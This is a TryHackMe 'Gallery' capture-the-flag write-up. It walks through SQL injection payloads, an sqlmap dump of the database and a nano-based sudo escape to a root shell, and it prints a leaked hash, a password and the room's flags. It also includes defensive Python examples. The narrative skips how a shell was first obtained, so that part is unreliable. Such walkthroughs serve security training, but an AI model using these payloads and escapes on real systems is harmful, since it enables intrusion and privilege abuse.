[THM] Gallery — Writeup
The author gets into a simple image gallery site through a SQL injection vulnerability, then uses a password found in a backup file to obtain user-level access. Root is gained through a sudo rule and a "rootkit" script, and the flags in user.txt and root.txt are collected. 2025-9-27 12:31:21 Author: infosecwriteups.com

ViraSecurity


https://tryhackme.com/room/gallery666

I’ll be honest... I wasn’t planning on spending my whole evening after my date untangling a “Simple Image Gallery,” but curiosity got the better of me (and maybe a little double caffeine). What started as a quick peek soon spiraled into a full-on digital treasure hunt. From poking at web forms to chasing down sneaky backup files, this room delivered more surprises than I expected. Still, it’s relatively easy to dive into!


If you’re thinking about diving into the Gallery room, or just want to follow along with my misadventures, keep reading for the full play-by-play (and some tips I wish I’d known from the start).

1. Initial Reconnaissance

1.1. Target Discovery

First things first, I grabbed the target IP from TryHackMe and made sure it was up:

ping <target-ip>

1.2. Port Scanning

Time for some Nmap action to uncover open ports and running services:

nmap -sC -sV -oN initial.nmap <target-ip>

Findings:

  • 80/tcp — Apache httpd 2.4.29 (Ubuntu)
  • 8080/tcp — Apache httpd 2.4.29 (Ubuntu)

Both ports are hosting web servers. This is where the fun begins.

2. Web Application Enumeration

2.1. Browsing the Sites

  • Port 80: Default Apache page, nothing interesting.
  • Port 8080: A basic “Simple Image Gallery” web app appears.

2.2. Directory and File Brute-Forcing

I ran gobuster to hunt for hidden directories and files:

gobuster dir -u http://<target-ip>:8080 -w /usr/share/wordlists/dirb/common.txt

This revealed standard directories (/images, /uploads, etc.) but nothing immediately juicy.

3. Exploiting the Web App

3.1. Testing for SQL Injection

The gallery app had login and search features, so I started testing both for SQLi:

  • Inputting ' OR 1=1-- - in the login fields and search boxes
  • Watching the responses for database errors, changed result sets, or an unexpected login

Bingo! The search feature was vulnerable: entries like test' or '1'='1 returned every image, because the injected OR '1'='1' makes the query’s WHERE clause true for every row.
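
To make the “returned all images” behaviour concrete, here is an added example (not code from the writeup, and not the room’s own PHP, whose query is never shown) that rebuilds the search in Python over an in-memory SQLite table. The table, the column names and the LIKE '<input>' query shape are assumptions. It puts the string-concatenated query next to its parameterised form, and it also shows the boolean probe that sqlmap automates: two payloads differing only in a true/false tail give different results only when the input is parsed as SQL.

```python
import sqlite3

# Constructed stand-in for the gallery's image table. The real app's schema and
# query text are not on the page, so the table and the LIKE '<input>' shape are
# assumptions made for this example.
def build_gallery():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO images (title) VALUES (?)",
                     [("cat",), ("dog",), ("sunset",)])
    return conn


def search_vulnerable(conn, query):
    """String-concatenated search: whatever the user types becomes SQL text."""
    sql = f"SELECT id, title FROM images WHERE title LIKE '{query}'"
    return conn.execute(sql).fetchall()


def search_safe(conn, query):
    """Parameterised search: the input is bound as a value and never parsed."""
    return conn.execute(
        "SELECT id, title FROM images WHERE title LIKE ?", (query,)
    ).fetchall()


def looks_injectable(search, conn):
    """Boolean probe of the kind sqlmap automates: two payloads that differ only
    in a true/false tail return different row counts only if the tail is
    evaluated as SQL. A safe endpoint treats both as literal titles."""
    true_rows = search(conn, "zzz' OR '1'='1")
    false_rows = search(conn, "zzz' OR '1'='2")
    return len(true_rows) != len(false_rows)


if __name__ == "__main__":
    db = build_gallery()
    for payload in ("cat", "test' or '1'='1", "' OR 1=1-- -"):
        print(repr(payload),
              "vulnerable:", search_vulnerable(db, payload),
              "safe:", search_safe(db, payload))
    print("vulnerable endpoint injectable:", looks_injectable(search_vulnerable, db))
    print("safe endpoint injectable:", looks_injectable(search_safe, db))
```

The two payloads from the writeup both work against the concatenated query: test' or '1'='1 closes the string and appends an always-true condition, and ' OR 1=1-- - does the same but comments out the trailing quote. Against the bound parameter they are just titles that match nothing.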

3.2. Dumping the Database

To automate, I used sqlmap:

sqlmap -u "http://<target-ip>:8080/search.php?query=cat" --level=5 --risk=3 --dump-all

After some patience, sqlmap retrieved the users table. (--dump-all pulls every database on the server; listing them with --dbs and then dumping just the users table with -D and -T is much quicker.) In it I found the admin hash:

a228b12a08b6527e7978cbe5d914531c

It is 32 hex characters long, the length of an unsalted MD5 digest. I tried cracking it with hashcat and rockyou, but moved on since a direct login wasn’t needed for the next steps.

4. Foothold on the System

4.1. Searching for File Upload Vulnerabilities

I checked whether the gallery allowed image uploads. It did, with some restrictions: I tried uploading PHP shells disguised as images (for example renaming shell.php to shell.jpg), but the upload filter rejected them. Worth noting for later, but not the way in here.

4.2. Exploring for Sensitive Files

Since the app was leaking data through SQLi, I tried using the same injection to read files from the filesystem:

sqlmap --file-read="/etc/passwd" ...

This only works if the database account holds the FILE privilege (and, on MySQL, secure_file_priv does not rule the path out), and in any case I didn’t get anything immediately useful. Time to look elsewhere.

5. Local File Discovery

5.1. Checking for Backups

Standard practice once you have any shell on the target: check /var/backups and similar directories for juicy files.

ls -la /var/backups/

Found: mike_home_backup.tar.gz

5.2. Extracting and Analyzing the Backup

I pulled the archive back to my machine (with a shell on the target, wget against a throwaway web server, or scp, both work; otherwise the web vulnerability itself) and unpacked it:

tar -xzvf mike_home_backup.tar.gz
cd mike_home_backup

Inside, I found a .bash_history file.

cat .bash_history

A password had been typed on the command line and recorded in the history:
b3stpassw0rdbr0xx
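
The two things worth doing with a recovered home-directory backup are checking the archive before you unpack it and scanning the shell history for secrets instead of reading it by eye. The following is an added example (my code, not the writeup’s) that does both in Python on a constructed .tar.gz: the history lines, the mysql/sshpass/sudo patterns, and the hostile ../ member are all made up for the example, and the real archive’s layout beyond “it contained a .bash_history” is not on the page.

```python
import io
import re
import tarfile

# Constructed sample history. None of these commands or secrets are from the
# room; they stand in for the kinds of lines that leak credentials.
HISTORY = """\
ls -la
cd /var/www/html
mysql -u gallery -pNotTheRealDbPass gallery_db
echo 'sup3r-s3cret' | sudo -S apt update
ssh admin@10.0.0.5
sshpass -p 'hunter2' ssh backup@10.0.0.6
exit
"""

# Patterns for commands that usually carry a secret on the command line.
CRED_PATTERNS = [
    re.compile(r"\bmysql\b.*\s-p\S+"),            # mysql ... -pPASSWORD
    re.compile(r"\bsshpass\s+-p\s*\S+"),          # sshpass -p PASSWORD
    re.compile(r"echo\s+\S+\s*\|\s*sudo\s+-S"),   # echo PASS | sudo -S
    re.compile(r"\bpasswd\b"),                    # interactive passwd; secret may follow
    re.compile(r"(?i)pass(word)?\s*[:=]\s*\S+"),  # PASSWORD=... style assignments
]


def build_backup_bytes():
    """Build an in-memory .tar.gz holding a history file plus one hostile
    path-traversal member, so the extraction guard below has something to catch."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = HISTORY.encode()
        info = tarfile.TarInfo("mike_home_backup/.bash_history")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
        evil = b"* * * * * root /tmp/x\n"          # constructed hostile payload
        info = tarfile.TarInfo("../../etc/cron.d/evil")
        info.size = len(evil)
        tar.addfile(info, io.BytesIO(evil))
    return buf.getvalue()


def is_safe_member(name):
    """Reject absolute paths and any '..' component: a crafted archive could
    otherwise write outside the directory you extract into."""
    return not name.startswith("/") and ".." not in name.split("/")


def read_backup(archive):
    """Return {member_name: text} for every safe, regular-file member, reading
    from the archive instead of extracting to disk."""
    files = {}
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not is_safe_member(member.name):
                continue
            files[member.name] = tar.extractfile(member).read().decode(errors="replace")
    return files


def credential_hints(history_text):
    """Lines of a shell history that are likely to carry a secret."""
    return [line for line in history_text.splitlines()
            if any(p.search(line) for p in CRED_PATTERNS)]


def scan_backup(archive):
    """Map each history file in the archive to its credential-bearing lines."""
    return {name: credential_hints(text)
            for name, text in read_backup(archive).items()
            if name.endswith(".bash_history")}


if __name__ == "__main__":
    for name, hits in scan_backup(build_backup_bytes()).items():
        print(name)
        for line in hits:
            print("  ", line)
```

On the command line the equivalent of is_safe_member is listing with tar -tzf before extracting and refusing anything that starts with / or contains ../; Python 3.12 and later enforce the same guard when you pass filter="data" to tarfile.extractall. The pattern list is deliberately narrow: plain ssh user@host lines are not flagged, because a hint list that fires on every line is no better than cat.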

6. User Privilege Escalation

6.1. SSH or Local Switch

I checked for SSH access first; since port 22 hadn’t shown up in the Nmap scan, I used the shell I already had to switch users instead:

su mike
# Password: b3stpassw0rdbr0xx

Success! Now running as mike.

6.2. Grabbing the User Flag

cat /home/mike/user.txt

User flag:
THM{af05cd30bfed67849befd546ef}

7. Root Privilege Escalation

7.1. Checking Sudo Permissions

sudo -l

Finding:
(ALL) NOPASSWD: /opt/rootkit.sh

7.2. Analyzing /opt/rootkit.sh

I read the script:

cat /opt/rootkit.sh

It offered a menu, and one option opened a file in nano. Because the script runs as root under sudo, nano inherits that root context, and nano can run external commands.

7.3. Exploiting Nano for Root Shell

Following GTFOBins:

  1. Run: sudo /opt/rootkit.sh
  2. Choose the “read” option (opens nano)
  3. In nano, press Ctrl+R (Read File), then Ctrl+X (Execute Command) to get a command prompt
  4. At the prompt, type:
    reset; sh 1>&0 2>&0
  5. Hit Enter — now I had a root shell!
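
The sudo -l output plus a read of the wrapper script is the whole privesc here, and it is also exactly what a defender should be checking before an attacker does. The following is an added example (my code, not the writeup’s and not the room’s /opt/rootkit.sh, whose contents the page does not quote) that parses a constructed sudo -l listing, finds each rule’s target script, and flags scripts that hand the operator a binary GTFOBins lists as a shell or file-access escape. The hostname, the Defaults line, the second sudo rule and the mock menu script are all made up for the example.

```python
import re

# Constructed sample `sudo -l` output in the layout sudo prints on Ubuntu. The
# hostname, Defaults line and systemctl rule are made up; the first rule
# mirrors the one in the writeup.
SUDO_L_OUTPUT = """\
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mike may run the following commands on gallery:
    (ALL) NOPASSWD: /opt/rootkit.sh
    (root) /usr/bin/systemctl restart apache2
"""

# Constructed stand-in for a menu script that opens an editor. This is NOT the
# room's script; it only reproduces the "a menu option runs nano" shape.
MOCK_SCRIPT = """\
#!/bin/bash
echo "1) read the log"
echo "2) clean up"
read -p "choice: " choice
case "$choice" in
  1) nano /var/log/app.log ;;
  2) rm -f /tmp/*.log ;;
esac
"""

# Binaries that spawn a shell or read/write arbitrary files once they run as
# root (an abbreviated cut of the GTFOBins shell / file-read / file-write lists).
ESCAPE_BINARIES = {"nano", "vi", "vim", "less", "more", "man", "awk", "find",
                   "python", "python3", "perl", "tar", "env", "bash", "sh"}

RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(output):
    """Return the rules listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            tags = m.group("tags").replace(":", "").split()
            rules.append({"runas": m.group("runas"),
                          "nopasswd": "NOPASSWD" in tags,
                          "command": m.group("cmd").strip()})
    return rules


def escape_binaries_in(script_text):
    """Names from ESCAPE_BINARIES invoked anywhere in a script, comments excluded."""
    found = set()
    for line in script_text.splitlines():
        if line.strip().startswith("#"):
            continue
        for token in re.findall(r"[A-Za-z0-9_./-]+", line):
            name = token.rsplit("/", 1)[-1]     # strip a leading path
            if name in ESCAPE_BINARIES:
                found.add(name)
    return found


def audit(sudo_output, read_script):
    """read_script(path) returns the script's text or None if unreadable.
    Returns one finding per sudo rule whose target spawns an escape binary."""
    findings = []
    for rule in parse_sudo_l(sudo_output):
        text = read_script(rule["command"].split()[0])
        if text is None:
            continue
        escapes = escape_binaries_in(text)
        if escapes:
            findings.append({**rule, "escapes": sorted(escapes)})
    return findings


if __name__ == "__main__":
    mock_fs = {"/opt/rootkit.sh": MOCK_SCRIPT}
    for f in audit(SUDO_L_OUTPUT, mock_fs.get):
        print(f"{f['command']} runs as ({f['runas']})"
              f"{' without a password' if f['nopasswd'] else ''} and spawns {f['escapes']}")
```

The defender’s fix is the mirror of the attack: a sudo rule should never hand out an interactive editor, pager or interpreter as root, whether directly or through a wrapper script; use sudoedit for the one-file case, and treat NOPASSWD on anything that opens an editor as a finding in its own right.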

7.4. Getting the Root Flag

cat /root/root.txt

Root flag:
THM{ba87e0dfe5903adfa6b8b450ad7567bafde87}

8. Final Notes and Lessons Learned

  • Enumeration is everything: Always dig for hidden files, directories, and backup archives.
  • SQL injection still works: Don’t overlook classic vulnerabilities.
  • Privilege escalation is all about detail: Check sudo rights, read custom scripts, and use GTFOBins tricks.
  • Backups and history files are goldmines: Always snoop through them.

Recap of Key Commands

  • nmap -sC -sV -oN initial.nmap <target-ip>
  • gobuster dir -u http://<target-ip>:8080 -w /usr/share/wordlists/dirb/common.txt
  • sqlmap -u "http://<target-ip>:8080/search.php?query=cat" --level=5 --risk=3 --dump-all
  • cat .bash_history
  • su mike
  • sudo -l
  • Exploiting nano via GTFOBins for a root shell

If you’re stuck on any step, try to slow down and explore all the files and web features. Good luck and happy hacking!



Source: https://infosecwriteups.com/thm-gallery-writeup-3a5d7d607646?source=rss----7b722bfd1b8d---4